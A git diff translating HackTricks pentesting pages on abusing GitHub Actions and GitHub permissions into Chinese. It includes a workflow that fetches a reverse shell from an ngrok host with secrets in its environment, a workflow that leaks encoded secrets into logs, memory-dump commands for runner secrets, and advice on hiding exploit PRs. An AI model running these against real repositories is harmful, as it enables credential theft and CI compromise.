+如果一个账户更改了名称,其他用户在一段时间后可以注册一个相同名称的账户。如果一个仓库在更改名称之前的**星标少于100个**,Github将允许新注册的用户使用相同的名称创建一个**与被删除的仓库同名的仓库**。
> [!CAUTION]
-> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action.
+> 因此,如果一个操作使用来自不存在账户的仓库,攻击者仍然有可能创建该账户并妥协该操作。
-If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
+如果其他仓库使用了**该用户仓库的依赖项**,攻击者将能够劫持它们。这里有一个更完整的解释:[https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/)
---
-## Repo Pivoting
+## 仓库转移
> [!NOTE]
-> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section).
+> 在本节中,我们将讨论允许**从一个仓库转移到另一个仓库**的技术,假设我们在第一个仓库上有某种访问权限(请查看前一节)。
-### Cache Poisoning
+### 缓存中毒
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+在**同一分支的工作流运行之间**维护一个缓存。这意味着如果攻击者**妥协**了一个**包**,然后将其存储在缓存中,并被**更高权限的**工作流**下载**和执行,他将能够**妥协**该工作流。
{{#ref}}
gh-actions-cache-poisoning.md
{{#endref}}
-### Artifact Poisoning
+### 工件中毒
-Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**:
+工作流可以使用**来自其他工作流甚至仓库的工件**,如果攻击者设法**妥协**了上传工件的Github Action,而该工件随后被另一个工作流使用,他可以**妥协其他工作流**:
{{#ref}}
gh-actions-artifact-poisoning.md
@@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md
---
-## Post Exploitation from an Action
+## 从操作后的利用
-### Accessing AWS and GCP via OIDC
+### 通过OIDC访问AWS和GCP
-Check the following pages:
+查看以下页面:
{{#ref}}
../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -408,170 +390,160 @@ Check the following pages:
../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
{{#endref}}
-### Accessing secrets
+### 访问秘密
-If you are injecting content into a script it's interesting to know how you can access secrets:
+如果您正在向脚本中注入内容,了解如何访问秘密是很有趣的:
-- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**.
+- 如果秘密或令牌被设置为**环境变量**,可以通过环境直接使用**`printenv`**访问。
-List secrets in Github Action output
-
+在Github Action输出中列出秘密
```yaml
name: list_env
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - '**'
- push: # Run it when a push is made to a branch
- branches:
- - '**'
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- '**'
+push: # Run it when a push is made to a branch
+branches:
+- '**'
jobs:
- List_env:
- runs-on: ubuntu-latest
- steps:
- - name: List Env
- # Need to base64 encode or github will change the secret value for "***"
- run: sh -c 'env | grep "secret_" | base64 -w0'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-Get reverse shell with secrets
-
+通过秘密获取反向 shell
```yaml
name: revshell
on:
- workflow_dispatch: # Launch manually
- pull_request: #Run it when a PR is created to a branch
- branches:
- - "**"
- push: # Run it when a push is made to a branch
- branches:
- - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
jobs:
- create_pull_request:
- runs-on: ubuntu-latest
- steps:
- - name: Get Rev Shell
- run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
- env:
- secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
- secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
```
-
-- If the secret is used **directly in an expression**, the generated shell script is stored **on-disk** and is accessible.
- - ```bash
- cat /home/runner/work/_temp/*
- ```
-- For a JavaScript actions the secrets and sent through environment variables
- - ```bash
- ps axe | grep node
- ```
-- For a **custom action**, the risk can vary depending on how a program is using the secret it obtained from the **argument**:
+- 如果秘密**直接在表达式中使用**,生成的 shell 脚本将存储在**磁盘上**并可访问。
+- ```bash
+cat /home/runner/work/_temp/*
+```
+- 对于 JavaScript actions,秘密通过环境变量发送
+- ```bash
+ps axe | grep node
+```
+- 对于**自定义操作**,风险可能会有所不同,具体取决于程序如何使用从**参数**中获得的秘密:
- ```yaml
- uses: fakeaction/publish@v3
- with:
- key: ${{ secrets.PUBLISH_KEY }}
- ```
+```yaml
+uses: fakeaction/publish@v3
+with:
+key: ${{ secrets.PUBLISH_KEY }}
+```
-### Abusing Self-hosted runners
+### 滥用自托管运行器
-The way to find which **Github Actions are being executed in non-github infrastructure** is to search for **`runs-on: self-hosted`** in the Github Action configuration yaml.
+查找**在非 GitHub 基础设施中执行的 GitHub Actions**的方法是搜索 GitHub Action 配置 yaml 中的**`runs-on: self-hosted`**。
-**Self-hosted** runners might have access to **extra sensitive information**, to other **network systems** (vulnerable endpoints in the network? metadata service?) or, even if it's isolated and destroyed, **more than one action might be run at the same time** and the malicious one could **steal the secrets** of the other one.
-
-In self-hosted runners it's also possible to obtain the **secrets from the \_Runner.Listener**\_\*\* process\*\* which will contain all the secrets of the workflows at any step by dumping its memory:
+**自托管**运行器可能访问**额外的敏感信息**,访问其他**网络系统**(网络中的脆弱端点?元数据服务?)或者,即使它是隔离和销毁的,**可能会同时运行多个操作**,恶意操作可能会**窃取其他操作的秘密**。
+在自托管运行器中,还可以通过转储其内存来获取**来自 \_Runner.Listener**\_\*\* 进程\*\* 的**秘密**,该进程将在任何步骤中包含工作流的所有秘密:
```bash
sudo apt-get install -y gdb
sudo gcore -o k.dump "$(ps ax | grep 'Runner.Listener' | head -n 1 | awk '{ print $1 }')"
```
+检查[**此帖子以获取更多信息**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/)。
-Check [**this post for more information**](https://karimrahal.com/2023/01/05/github-actions-leaking-secrets/).
+### Github Docker 镜像注册表
-### Github Docker Images Registry
-
-It's possible to make Github actions that will **build and store a Docker image inside Github**.\
-An example can be find in the following expandable:
+可以创建 Github actions 来 **在 Github 内部构建和存储 Docker 镜像**。\
+以下可找到一个示例:
-Github Action Build & Push Docker Image
-
+Github Action 构建 & 推送 Docker 镜像
```yaml
[...]
- name: Set up Docker Buildx
- uses: docker/setup-buildx-action@v1
+uses: docker/setup-buildx-action@v1
- name: Login to GitHub Container Registry
- uses: docker/login-action@v1
- with:
- registry: ghcr.io
- username: ${{ github.repository_owner }}
- password: ${{ secrets.ACTIONS_TOKEN }}
+uses: docker/login-action@v1
+with:
+registry: ghcr.io
+username: ${{ github.repository_owner }}
+password: ${{ secrets.ACTIONS_TOKEN }}
- name: Add Github Token to Dockerfile to be able to download code
- run: |
- sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
+run: |
+sed -i -e 's/TOKEN=##VALUE##/TOKEN=${{ secrets.ACTIONS_TOKEN }}/g' Dockerfile
- name: Build and push
- uses: docker/build-push-action@v2
- with:
- context: .
- push: true
- tags: |
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
- ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
+uses: docker/build-push-action@v2
+with:
+context: .
+push: true
+tags: |
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:latest
+ghcr.io/${{ github.repository_owner }}/${{ github.event.repository.name }}:${{ env.GITHUB_NEWXREF }}-${{ github.sha }}
[...]
```
-
-As you could see in the previous code, the Github registry is hosted in **`ghcr.io`**.
-
-A user with read permissions over the repo will then be able to download the Docker Image using a personal access token:
+正如您在之前的代码中看到的,Github 注册表托管在 **`ghcr.io`**。
+具有对该仓库的读取权限的用户将能够使用个人访问令牌下载 Docker 镜像:
```bash
echo $gh_token | docker login ghcr.io -u --password-stdin
docker pull ghcr.io//:
```
-
-Then, the user could search for **leaked secrets in the Docker image layers:**
+然后,用户可以搜索 **Docker 镜像层中的泄露秘密:**
{{#ref}}
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics
{{#endref}}
-### Sensitive info in Github Actions logs
+### Github Actions 日志中的敏感信息
-Even if **Github** try to **detect secret values** in the actions logs and **avoid showing** them, **other sensitive data** that could have been generated in the execution of the action won't be hidden. For example a JWT signed with a secret value won't be hidden unless it's [specifically configured](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret).
+即使 **Github** 尝试 **检测日志中的秘密值** 并 **避免显示** 它们,**其他敏感数据** 在执行操作时生成的内容仍然不会被隐藏。例如,使用秘密值签名的 JWT 除非 [特别配置](https://github.com/actions/toolkit/tree/main/packages/core#setting-a-secret),否则不会被隐藏。
-## Covering your Tracks
+## 掩盖你的痕迹
-(Technique from [**here**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit)) First of all, any PR raised is clearly visible to the public in Github and to the target GitHub account. In GitHub by default, we **can’t delete a PR of the internet**, but there is a twist. For Github accounts that are **suspended** by Github, all of their **PRs are automatically deleted** and removed from the internet. So in order to hide your activity you need to either get your **GitHub account suspended or get your account flagged**. This would **hide all your activities** on GitHub from the internet (basically remove all your exploit PR)
+(技术来自 [**这里**](https://divyanshu-mehta.gitbook.io/researchs/hijacking-cloud-ci-cd-systems-for-fun-and-profit))首先,任何提出的 PR 在 Github 上对公众和目标 GitHub 账户都是明显可见的。在 GitHub 中,默认情况下,我们 **无法删除互联网上的 PR**,但有一个变数。对于被 Github **暂停** 的 GitHub 账户,所有的 **PR 会被自动删除** 并从互联网上移除。因此,为了隐藏你的活动,你需要让你的 **GitHub 账户被暂停或被标记**。这将 **隐藏你在 GitHub 上的所有活动**(基本上移除你所有的利用 PR)
-An organization in GitHub is very proactive in reporting accounts to GitHub. All you need to do is share “some stuff” in Issue and they will make sure your account is suspended in 12 hours :p and there you have, made your exploit invisible on github.
+GitHub 中的一个组织非常积极地向 GitHub 举报账户。你所需要做的就是在 Issue 中分享“某些东西”,他们会确保你的账户在 12 小时内被暂停 :p 这样,你的利用在 GitHub 上就变得不可见了。
> [!WARNING]
-> The only way for an organization to figure out they have been targeted is to check GitHub logs from SIEM since from GitHub UI the PR would be removed.
+> 组织发现自己被针对的唯一方法是通过 SIEM 检查 GitHub 日志,因为从 GitHub UI 中 PR 会被移除。
-## Tools
+## 工具
-The following tools are useful to find Github Action workflows and even find vulnerable ones:
+以下工具对于查找 GitHub Action 工作流甚至查找易受攻击的工作流非常有用:
- [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
- [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
@@ -579,7 +551,3 @@ The following tools are useful to find Github Action workflows and even find vul
- [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
index ae156de2d..59da712ac 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -1,6 +1 @@
# Gh Actions - Artifact Poisoning
-
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
index 024aa5ff8..489446262 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -1,6 +1 @@
-# GH Actions - Cache Poisoning
-
-
-
-
-
+# GH Actions - 缓存中毒
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
index 3cd632bd0..7504dd8ff 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -1,6 +1 @@
-# Gh Actions - Context Script Injections
-
-
-
-
-
+# Gh Actions - 上下文脚本注入
diff --git a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
index f19fa699e..699952c62 100644
--- a/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
+++ b/src/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -2,59 +2,55 @@
{{#include ../../banners/hacktricks-training.md}}
-This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+这种访问被认为已删除的Github数据的方法在[**这篇博客文章中报告**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)。
## Accessing Deleted Fork Data
-1. You fork a public repository
-2. You commit code to your fork
-3. You delete your fork
+1. 你fork一个公共仓库
+2. 你向你的fork提交代码
+3. 你删除你的fork
> [!CAUTION]
-> The data commited in the deleted fork is still accessible.
+> 在已删除的fork中提交的数据仍然可以访问。
## Accessing Deleted Repo Data
-1. You have a public repo on GitHub.
-2. A user forks your repo.
-3. You commit data after they fork it (and they never sync their fork with your updates).
-4. You delete the entire repo.
+1. 你在GitHub上有一个公共仓库。
+2. 一个用户fork了你的仓库。
+3. 你在他们fork之后提交数据(而他们从未将他们的fork与您的更新同步)。
+4. 你删除整个仓库。
> [!CAUTION]
-> Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+> 即使你删除了你的仓库,对其所做的所有更改仍然可以通过fork访问。
## Accessing Private Repo Data
-1. You create a private repo that will eventually be made public.
-2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
-3. You make your “upstream” repository public and keep your fork private.
+1. 你创建一个最终会公开的私有仓库。
+2. 你创建该仓库的私有内部版本(通过fork)并提交额外的代码用于你不打算公开的功能。
+3. 你将你的“上游”仓库设为公开,并保持你的fork为私有。
> [!CAUTION]
-> It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+> 在内部fork创建和公共版本公开之间的时间内,可以访问推送到内部fork的所有数据。
## How to discover commits from deleted/hidden forks
-The same blog post propose 2 options:
+同一篇博客文章提出了两个选项:
### Directly accessing the commit
-If the commit ID (sha-1) value is known it's possible to access it in `https://github.com///commit/`
+如果已知提交ID(sha-1)值,可以在`https://github.com///commit/`中访问它。
### Brute-forcing short SHA-1 values
-It's the same to access both of these:
+访问这两者是相同的:
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
- [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
-And the latest one use a short sha-1 that is bruteforceable.
+而最新的一个使用了一个可以暴力破解的短sha-1。
## References
- [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/basic-github-information.md b/src/pentesting-ci-cd/github-security/basic-github-information.md
index ae1365a0f..bfeafcf88 100644
--- a/src/pentesting-ci-cd/github-security/basic-github-information.md
+++ b/src/pentesting-ci-cd/github-security/basic-github-information.md
@@ -1,248 +1,241 @@
-# Basic Github Information
+# 基本的 Github 信息
{{#include ../../banners/hacktricks-training.md}}
-## Basic Structure
+## 基本结构
-The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+大型 **公司** 的基本 github 环境结构是拥有一个 **企业**,该企业拥有 **多个组织**,每个组织可能包含 **多个代码库** 和 **多个团队**。较小的公司可能只 **拥有一个组织而没有企业**。
-From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+从用户的角度来看,**用户** 可以是 **不同企业和组织的成员**。在这些组织中,用户可能拥有 **不同的企业、组织和代码库角色**。
-Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+此外,用户可能是 **不同团队的一部分**,并拥有不同的企业、组织或代码库角色。
-And finally **repositories may have special protection mechanisms**.
+最后,**代码库可能具有特殊的保护机制**。
-## Privileges
+## 权限
-### Enterprise Roles
+### 企业角色
-- **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
-- **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+- **企业所有者**:拥有此角色的人可以 **管理管理员、管理企业内的组织、管理企业设置、在组织间强制执行政策**。但是,他们 **无法访问组织设置或内容**,除非他们被指定为组织所有者或获得对组织拥有的代码库的直接访问权限。
+- **企业成员**:由您的企业拥有的组织的成员也 **自动成为企业成员**。
-### Organization Roles
+### 组织角色
-In an organisation users can have different roles:
+在组织中,用户可以拥有不同的角色:
-- **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
-- **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
-- **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
-- **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
- - If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
-- **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
-- **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+- **组织所有者**:组织所有者对您的组织拥有 **完全的管理访问权限**。此角色应限制,但不应少于两人。
+- **组织成员**:在 **组织中的人** 的默认非管理角色是组织成员。默认情况下,组织成员 **拥有一定数量的权限**。
+- **账单管理员**:账单管理员是可以 **管理您组织的账单设置** 的用户,例如支付信息。
+- **安全管理员**:这是组织所有者可以分配给组织中任何团队的角色。应用后,它赋予团队的每个成员权限,以 **管理组织内的安全警报和设置,以及对所有代码库的读取权限**。
+- 如果您的组织有安全团队,您可以使用安全管理员角色为团队成员提供他们所需的最低访问权限。
+- **Github 应用管理员**:为了允许其他用户 **管理组织拥有的 GitHub 应用**,所有者可以授予他们 GitHub 应用管理员权限。
+- **外部协作者**:外部协作者是指 **可以访问一个或多个组织代码库但不是组织的明确成员** 的人。
-You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+您可以在此表中 **比较这些角色的权限**:[https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
-### Members Privileges
+### 成员权限
-In _https://github.com/organizations/\/settings/member_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+在 _https://github.com/organizations/\/settings/member_privileges_ 中,您可以查看 **用户仅因成为组织的一部分而拥有的权限**。
-The settings here configured will indicate the following permissions of members of the organisation:
+此处配置的设置将指示组织成员的以下权限:
-- Be admin, writer, reader or no permission over all the organisation repos.
-- If members can create private, internal or public repositories.
-- If forking of repositories is possible
-- If it's possible to invite outside collaborators
-- If public or private sites can be published
-- The permissions admins has over the repositories
-- If members can create new teams
+- 对所有组织代码库拥有管理员、写入、读取或无权限。
+- 成员是否可以创建私有、内部或公共代码库。
+- 是否可以对代码库进行分叉。
+- 是否可以邀请外部协作者。
+- 是否可以发布公共或私有网站。
+- 管理员对代码库的权限。
+- 成员是否可以创建新团队。
-### Repository Roles
+### 代码库角色
-By default repository roles are created:
+默认情况下,创建的代码库角色有:
-- **Read**: Recommended for **non-code contributors** who want to view or discuss your project
-- **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
-- **Write**: Recommended for contributors who **actively push to your project**
-- **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
-- **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+- **读取**:推荐给 **非代码贡献者**,希望查看或讨论您的项目。
+- **分类**:推荐给 **需要主动管理问题和拉取请求的贡献者**,但没有写入权限。
+- **写入**:推荐给 **积极推送到您的项目的贡献者**。
+- **维护**:推荐给 **需要管理代码库的项目经理**,但不需要访问敏感或破坏性操作。
+- **管理员**:推荐给需要 **对项目拥有完全访问权限** 的人,包括管理安全或删除代码库等敏感和破坏性操作。
-You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+您可以在此表中 **比较每个角色的权限**:[https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
-You can also **create your own roles** in _https://github.com/organizations/\/settings/roles_
+您还可以在 _https://github.com/organizations/\/settings/roles_ 中 **创建自己的角色**。
-### Teams
+### 团队
-You can **list the teams created in an organization** in _https://github.com/orgs/\/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+您可以在 _https://github.com/orgs/\/teams_ 中 **列出组织中创建的团队**。请注意,要查看其他团队的子团队,您需要访问每个父团队。
-### Users
+### 用户
-The users of an organization can be **listed** in _https://github.com/orgs/\/people._
+组织的用户可以在 _https://github.com/orgs/\/people_ 中 **列出**。
-In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+在每个用户的信息中,您可以看到 **用户是哪个团队的成员**,以及 **用户可以访问的代码库**。
-## Github Authentication
+## Github 认证
-Github offers different ways to authenticate to your account and perform actions on your behalf.
+Github 提供不同的方式来验证您的帐户并代表您执行操作。
-### Web Access
+### 网络访问
-Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+访问 **github.com**,您可以使用 **用户名和密码**(以及 **可能的 2FA**)登录。
-### **SSH Keys**
+### **SSH 密钥**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。[https://github.com/settings/keys](https://github.com/settings/keys)
-#### **GPG Keys**
+#### **GPG 密钥**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **在没有签名的情况下发送提交时被发现**。了解更多关于 [警惕模式的信息](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode)。
-### **Personal Access Tokens**
+### **个人访问令牌**
-You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。创建个人访问令牌时,**用户** 需要 **指定** 令牌将拥有的 **权限**。[https://github.com/settings/tokens](https://github.com/settings/tokens)
-### Oauth Applications
+### Oauth 应用
-Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+Oauth 应用可能会请求您 **访问部分 GitHub 信息或冒充您** 执行某些操作。此功能的一个常见示例是您可能在某些平台上找到的 **使用 GitHub 登录按钮**。
-- You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
-- You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
-- You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
-- You can see third party access of applications in an **organization** in _https://github.com/organizations/\/settings/oauth_application_policy_
+- 您可以在 [https://github.com/settings/developers](https://github.com/settings/developers) 中 **创建** 您自己的 **Oauth 应用**。
+- 您可以在 [https://github.com/settings/applications](https://github.com/settings/applications) 中查看所有 **访问您帐户的 Oauth 应用**。
+- 您可以在 [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps) 中查看 **Oauth 应用可以请求的范围**。
+- 您可以在 _https://github.com/organizations/\/settings/oauth_application_policy_ 中查看组织中应用程序的第三方访问。
-Some **security recommendations**:
+一些 **安全建议**:
-- An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
-- An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
-- **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
-- **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
-- **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+- **OAuth 应用** 应始终 **作为经过身份验证的 GitHub 用户在 GitHub 的所有地方操作**(例如,在提供用户通知时),并仅访问指定的范围。
+- OAuth 应用可以通过为经过身份验证的用户启用“使用 GitHub 登录”作为身份提供者。
+- **不要** 构建一个 **OAuth 应用**,如果您希望您的应用程序在 **单个代码库** 上操作。使用 `repo` OAuth 范围,OAuth 应用可以 **在所有**\*\* 经过身份验证的用户的代码库上操作\*\*。
+- **不要** 构建一个 OAuth 应用来作为您 **团队或公司的** 应用程序。OAuth 应用作为 **单个用户** 进行身份验证,因此如果一个人创建了一个供公司使用的 OAuth 应用,然后他们离开公司,其他人将无法访问它。
+- **更多** 信息在 [这里](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps)。
-### Github Applications
+### Github 应用
-Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+Github 应用可以请求权限以 **访问您的 GitHub 信息或冒充您** 执行特定操作。在 Github 应用中,您需要指定应用将访问的代码库。
-- To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
-- The GitHub App should **connect to a personal account or an organisation**.
-- You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
-- You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
-- These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
-- You can see installed apps in an **organization** in _https://github.com/organizations/\/settings/installations_
+- 要安装 GitHub 应用,您必须是 **组织所有者或在代码库中拥有管理员权限**。
+- GitHub 应用应 **连接到个人帐户或组织**。
+- 您可以在 [https://github.com/settings/apps](https://github.com/settings/apps) 中创建自己的 GitHub 应用。
+- 您可以在 [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations) 中查看所有 **访问您帐户的 GitHub 应用**。
+- 这些是 **GitHub 应用的 API 端点** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)。根据应用的权限,它将能够访问其中的一些。
+- 您可以在 _https://github.com/organizations/\/settings/installations_ 中查看组织中的已安装应用。
-Some security recommendations:
+一些安全建议:
